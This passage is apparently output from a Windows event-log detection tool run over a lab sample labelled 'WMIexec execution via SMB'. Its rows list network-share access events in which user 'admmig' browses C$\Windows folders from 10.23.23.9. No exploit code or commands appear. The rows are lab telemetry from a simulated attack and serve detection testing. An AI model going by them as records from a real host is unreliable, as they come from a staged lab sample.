SMB.evtx -2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\DesktopTileResources\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Downloaded Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ImmersiveControlPanel\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\media\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Offline Web Pages\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ToastData\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ar : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\bg : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\cs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\de : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\el : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\en : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\es : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\et : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\he : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hu : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\it : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ja : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ko : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\nl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\no : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt-BR : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ro : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ru : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sr-Latn-RS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\th : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\tr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\uk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANT : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HK : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\DevInvCache : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\apppatch64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom\Custom64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\en-US : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppReadiness : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 